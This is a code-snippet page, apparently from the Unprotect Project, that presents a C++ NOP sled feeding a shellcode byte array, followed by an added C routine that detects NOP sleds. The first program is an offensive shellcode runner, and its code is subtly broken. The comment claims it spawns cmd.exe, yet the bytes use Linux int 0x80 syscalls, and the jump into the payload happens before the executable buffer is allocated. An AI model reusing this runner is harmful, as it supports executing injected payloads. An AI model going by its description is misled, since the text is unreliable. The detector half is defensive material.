(C++) NOP Sled by Unprotect

Created the Tuesday 06 December 2022. Updated 1 year, 4 months ago.

Description:

This code creates a NOP slide with eight NOP instructions and then inserts the shellcode at the end of the slide. When the program branches to the start of the code section, it will slide through the NOP instructions until it reaches the shellcode, which will then be executed. This demonstrates how a NOP slide can be used to direct program execution to a specific location when the exact branch target is not known.

Code

#include <stdio.h>
#include <string.h>   // memcpy
#include <windows.h>  // VirtualAlloc, MEM_COMMIT, PAGE_EXECUTE_READWRITE

// Shellcode to spawn a cmd.exe process.
// Note that the first 16 bytes of the buffer are themselves NOPs (0x90),
// so the sled continues into the start of the buffer before the payload.
unsigned char shellcode[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                            "\x68\x63\x6d\x64\x00\x8b\xc4\x6a\x01\x50\x6a\x01\x6a\x02\x6a\x10"
                            "\x89\xe1\xb2\x0c\xcd\x80\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68"
                            "\x2f\x63\x61\x6c\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99"
                            "\xb0\x0b\xcd\x80";

int main(void) {
    // Insert a NOP slide at the start of the code section:
    // eight single-byte NOP instructions that execution falls through
    // regardless of which one the branch lands on.
    __asm__("nop\n"
            "nop\n"
            "nop\n"
            "nop\n"
            "nop\n"
            "nop\n"
            "nop\n"
            "nop\n");

    // Branch from the end of the NOP slide into the shellcode buffer
    __asm__("jmp shellcode");

    // Allocate executable memory for the shellcode and copy it into place
    void *shellcode_mem = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (shellcode_mem == NULL) {
        fprintf(stderr, "VirtualAlloc failed: %lu\n", GetLastError());
        return 1;
    }
    memcpy(shellcode_mem, shellcode, sizeof(shellcode));

    return 0;
}
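The same layout is what a scanner looks for on the defensive side: a long run of 0x90 bytes preceding something that is not a NOP. The following is an added example, not part of the Unprotect snippet above, that finds the longest NOP run in a buffer and flags it against a threshold; the `sample` buffer is constructed here from the first bytes of the array on this page, and the threshold value of 8 is an assumption, not a published rule.

```c
#include <stddef.h>
#include <stdio.h>

/* Start offset and length of the longest run of 0x90 bytes in a buffer. */
struct nop_run {
    size_t offset;
    size_t length;
};

/* Scan buf[0..len) and return the longest contiguous run of 0x90.
 * Only the canonical NOP is matched here; a production signature would
 * also cover the other single-byte instructions a sled can be built from. */
struct nop_run find_longest_nop_run(const unsigned char *buf, size_t len) {
    struct nop_run best = { 0, 0 };
    size_t i = 0;
    while (i < len) {
        if (buf[i] != 0x90) { i++; continue; }
        size_t start = i;
        while (i < len && buf[i] == 0x90) i++;   /* consume the run */
        if (i - start > best.length) {
            best.offset = start;
            best.length = i - start;
        }
    }
    return best;
}

/* Heuristic: a run at least `threshold` bytes long is treated as a sled. */
int looks_like_nop_sled(const unsigned char *buf, size_t len, size_t threshold) {
    return find_longest_nop_run(buf, len).length >= threshold;
}

/* Constructed sample: the 16 leading NOPs and the "push cmd" bytes from the
 * array on this page, then a return. */
static const unsigned char sample[] = {
    0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
    0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
    0x68,0x63,0x6d,0x64,0x00,0xc3
};

/* Constructed benign buffer: text with a single stray 0x90 in the middle. */
static const unsigned char benign[] = "hello \x90 world";

int main(void) {
    struct nop_run r = find_longest_nop_run(sample, sizeof sample);
    printf("longest run: offset %zu length %zu, sled=%d\n",
           r.offset, r.length, looks_like_nop_sled(sample, sizeof sample, 8));
    printf("benign flagged: %d\n", looks_like_nop_sled(benign, sizeof benign - 1, 8));
    return 0;
}
```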